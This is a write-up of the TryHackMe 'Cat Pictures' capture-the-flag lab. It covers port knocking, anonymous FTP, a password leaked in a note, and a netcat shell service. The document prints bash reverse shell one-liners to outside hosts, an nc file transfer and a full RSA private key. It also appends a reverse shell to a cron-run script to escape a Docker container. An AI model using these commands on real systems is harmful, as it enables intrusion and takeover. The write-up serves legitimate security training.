Cat Pictures (phpBB, Knockd, Docker)
First, we need to enumerate using nmap.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures
╰─➤ nmap -A 10.10.68.82 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-26 21:28 +0630
Nmap scan report for 10.10.68.82
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
| 256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_ 256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)
8080/tcp filtered http-proxy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.12 secondsPort 8080
You can see some interesting things in php forum.
It can be port knocking. We will knock 1111 2222 3333 4444 sequences and scan again using nmap.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures
╰─➤ knock 10.10.68.82 1111 2222 3333 4444
╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures
╰─➤ nmap 10.10.68.82
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-26 21:54 +0630
Nmap scan report for 10.10.68.82
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 36.74 secondsPort 21
Connect ftp using anonymous login.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures
╰─➤ ftp 10.10.68.82
Connected to 10.10.68.82.
220 (vsFTPd 3.0.3)
Name (10.10.68.82:hnl): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 162 Apr 02 2021 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (162 bytes).
226 Transfer complete.
162 bytes received in 0.02 secs (8.4402 kB/s)
ftp> Read the files.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures
╰─➤ cat note.txt
In case I forget my password, I'm leaving a pointer to the internal shell service on the server.
Connect to port 4420, the password is sardinethecat.
- catloverPort 4420
Connect port 4420 using sardinethecat password.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures
╰─➤ nc 10.10.68.82 4420
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
sardinethecat
Password accepted
ls -al
total 56
drwxr-xr-x 10 1001 1001 4096 Apr 3 2021 .
drwxr-xr-x 10 1001 1001 4096 Apr 3 2021 ..
-rw------- 1 1001 1001 50 Apr 1 2021 .bash_history
-rw-r--r-- 1 1001 1001 220 Apr 1 2021 .bash_logout
-rw-r--r-- 1 1001 1001 3771 Apr 1 2021 .bashrc
-rw-r--r-- 1 1001 1001 807 Apr 1 2021 .profile
drwxrwxr-x 2 1001 1001 4096 Apr 2 2021 bin
drwxr-xr-x 2 0 0 4096 Apr 1 2021 etc
drwxr-xr-x 3 0 0 4096 Apr 2 2021 home
drwxr-xr-x 3 0 0 4096 Apr 2 2021 lib
drwxr-xr-x 2 0 0 4096 Apr 1 2021 lib64
drwxr-xr-x 2 0 0 4096 Apr 2 2021 opt
drwxr-xr-x 2 0 0 4096 Apr 3 2021 tmp
drwxr-xr-x 4 0 0 4096 Apr 2 2021 usr
cat .bash_history
mkdir bin
exit
cp /bin/bash bin/
ls -alt bin
exitYou can run any command on this box. For stable shell, we can use bash reverse shell.
/bin/bash -c '/bin/bash -i >& /dev/tcp/10.9.0.82/9001 0>&1'In /home/catlover, we can see a file called runme. Transfer it to local.
# Local
nc -l 9899 > runme
# Remote
nc -w 3 10.9.0.82 9899 < runmeWith string analysis, the correct password is rebecca. We will run it runme file using this password.
I have no name!@cat-pictures:/home/catlover# ./runme
./runme
Please enter yout password: rebecca
Welcome, catlover! SSH key transfer queued!
I have no name!@cat-pictures:/home/catlover# ls -al /tmp
ls -al /tmp
total 8
drwxr-xr-x 2 0 0 4096 Apr 26 15:58 .
drwxr-xr-x 10 1001 1001 4096 Apr 3 2021 ..
-rw-r--r-- 1 0 0 0 Apr 26 15:58 gibmethesshkeyRead gibmethesshkey file in tmp. No content. But list the current directory, we can see private ssh key.
I have no name!@cat-pictures:/home/catlover# ls -al
ls -al
total 32
drwxr-xr-x 2 0 0 4096 Apr 26 15:59 .
drwxr-xr-x 3 0 0 4096 Apr 2 2021 ..
-rw-r--r-- 1 0 0 1675 Apr 26 15:59 id_rsa
-rwxr-xr-x 1 0 0 18856 Apr 3 2021 runmeRead the key file.
I have no name!@cat-pictures:/home/catlover# cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAmI1dCzfMF4y+TG3QcyaN3B7pLVMzPqQ1fSQ2J9jKzYxWArW5
IWnCNvY8gOZdOSWgDODCj8mOssL7SIIgkOuD1OzM0cMBSCCwYlaN9F8zmz6UJX+k
jSmQqh7eqtXuAvOkadRoFlyog2kZ1Gb72zebR75UCBzCKv1zODRx2zLgFyGu0k2u
xCa4zmBdm80X0gKbk5MTgM4/l8U3DFZgSg45v+2uM3aoqbhSNu/nXRNFyR/Wb10H
tzeTEJeqIrjbAwcOZzPhISo6fuUVNH0pLQOf/9B1ojI3/jhJ+zE6MB0m77iE07cr
lT5PuxlcjbItlEF9tjqudycnFRlGAKG6uU8/8wIDAQABAoIBAH1NyDo5p6tEUN8o
aErdRTKkNTWknHf8m27h+pW6TcKOXeu15o3ad8t7cHEUR0h0bkWFrGo8zbhpzcte
D2/Z85xGsWouufPL3fW4ULuEIziGK1utv7SvioMh/hXmyKymActny+NqUoQ2JSBB
QuhqgWJppE5RiO+U5ToqYccBv+1e2bO9P+agWe+3hpjWtiAUHEdorlJK9D+zpw8s
/+9CjpDzjXA45X2ikZ1AhWNLhPBnH3CpIgug8WIxY9fMbmU8BInA8M4LUvQq5A63
zvWWtuh5bTkj622QQc0Eq1bJ0bfUkQRD33sqRVUUBE9r+YvKxHAOrhkZHsvwWhK/
oylx3WECgYEAyFR+lUqnQs9BwrpS/A0SjbTToOPiCICzdjW9XPOxKy/+8Pvn7gLv
00j5NVv6c0zmHJRCG+wELOVSfRYv7z88V+mJ302Bhf6uuPd9Xu96d8Kr3+iMGoqp
tK7/3m4FjoiNCpZbQw9VHcZvkq1ET6qdzU+1I894YLVu258KeCVUqIMCgYEAwvHy
QTo6VdMOdoINzdcCCcrFCDcswYXxQ5SpI4qMpHniizoa3oQRHO5miPlAKNytw5PQ
zSKoIW47AObP2twzVAH7d+PWRzqAGZXW8gsF6Ls48LxSJGzz8V191PjbcGQO7Oro
Em8pQ+qCISxv3A8fKvG5E9xOspD0/3lsM/zGD9ECgYBOTgDAuFKS4dKRnCUt0qpK
68DBJfJHYo9DiJQBTlwVRoh/h+fLeChoTSDkQ5StFwTnbOg+Y83qAqVwsYiBGxWq
Q2YZ/ADB8KA5OrwtrKwRPe3S8uI4ybS2JKVtO1I+uY9v8P+xQcACiHs6OTH3dfiC
tUJXwhQKsUCo5gzAk874owKBgC/xvTjZjztIWwg+WBLFzFSIMAkjOLinrnyGdUqu
aoSRDWxcb/tF08efwkvxsRvbmki9c97fpSYDrDM+kOQsv9rrWeNUf4CpHJQuS9zf
ZSal1Q0v46vdt+kmqynTwnRTx2/xHf5apHV1mWd7PE+M0IeJR5Fg32H/UKH8ROZM
RpHhAoGAehljGmhge+i0EPtcok8zJe+qpcV2SkLRi7kJZ2LaR97QAmCCsH5SndzR
tDjVbkh5BX0cYtxDnfAF3ErDU15jP8+27pEO5xQNYExxf1y7kxB6Mh9JYJlq0aDt
O4fvFElowV6MXVEMY/04fdnSWavh0D+IkyGRcY5myFHyhWvmFcQ=
-----END RSA PRIVATE KEY-----Connect ssh using this private key.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures
╰─➤ ssh -i id_rsa catlover@10.10.68.82
The authenticity of host '10.10.68.82 (10.10.68.82)' can't be established.
ECDSA key fingerprint is SHA256:7HBac/JH7EKQik9kL1l9GMjCgLN/69gfXalu5cbPi4U.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.68.82' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Apr 26 09:06:23 PDT 2022
System load: 0.21 Users logged in: 0
Usage of /: 37.2% of 19.56GB IP address for eth0: 10.10.68.82
Memory usage: 60% IP address for br-98674f8f20f9: 172.18.0.1
Swap usage: 0% IP address for docker0: 172.17.0.1
Processes: 100
52 updates can be applied immediately.
25 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Last login: Fri Jun 4 14:40:35 2021
root@7546fa2336d6:/# User && Root
Read the flag.
root@7546fa2336d6:/# cat /root/flag.txt
7cf90a0e7c5d25f1a827d3efe6fe4d0edd63cca9We are in docker container. Here is .bash_history in /.
root@7546fa2336d6:/# cat .bash_history
exit
exit
exit
exit
exit
exit
exit
ip a
ifconfig
apt install ifconfig
ip
exit
nano /opt/clean/clean.sh
ping 192.168.4.20
apt install ping
apt update
apt install ping
apt install iptuils-ping
apt install iputils-ping
exit
ls
cat /opt/clean/clean.sh
nano /opt/clean/clean.sh
clear
cat /etc/crontab
ls -alt /
cat /post-init.sh
cat /opt/clean/clean.sh
bash -i >&/dev/tcp/192.168.4.20/4444 <&1
nano /opt/clean/clean.sh
nano /opt/clean/clean.sh
nano /opt/clean/clean.sh
nano /opt/clean/clean.sh
cat /var/log/dpkg.log
nano /opt/clean/clean.sh
nano /opt/clean/clean.sh
exit
exit
exitCheck the file system.
root@7546fa2336d6:/# df -hT
Filesystem Type Size Used Avail Use% Mounted on
overlay overlay 20G 7.3G 12G 40% /
tmpfs tmpfs 64M 0 64M 0% /dev
tmpfs tmpfs 240M 0 240M 0% /sys/fs/cgroup
shm tmpfs 64M 0 64M 0% /dev/shm
/dev/xvda1 ext4 20G 7.3G 12G 40% /opt/clean
tmpfs tmpfs 240M 0 240M 0% /proc/acpi
tmpfs tmpfs 240M 0 240M 0% /proc/scsi
tmpfs tmpfs 240M 0 240M 0% /sys/firmwareHum /opt/clean? What is that?
root@7546fa2336d6:/# cd /opt/clean
root@7546fa2336d6:/opt/clean# ls -al
total 16
drwxr-xr-x 2 root root 4096 May 1 2021 .
drwxrwxr-x 1 root root 4096 Mar 25 2021 ..
-rw-r--r-- 1 root root 27 May 1 2021 clean.sh
root@7546fa2336d6:/opt/clean# cat clean.sh
#!/bin/bash
rm -rf /tmp/*Abuse it.
root@7546fa2336d6:/opt/clean# echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.9.0.82/9002 0>&1'" >> /opt/clean/clean.sh
root@7546fa2336d6:/opt/clean# cat clean.sh
#!/bin/bash
rm -rf /tmp/*
/bin/bash -c '/bin/bash -i >& /dev/tcp/10.9.0.82/9002 0>&1'In netcat session, we got reverse shell.
Read the flag.
root@cat-pictures:~# cat /root/root.txt
cat /root/root.txt
Congrats!!!
Here is your flag:
4a98e43d78bab283938a06f38d2ca3a3c53f0476Last updated
Was this helpful?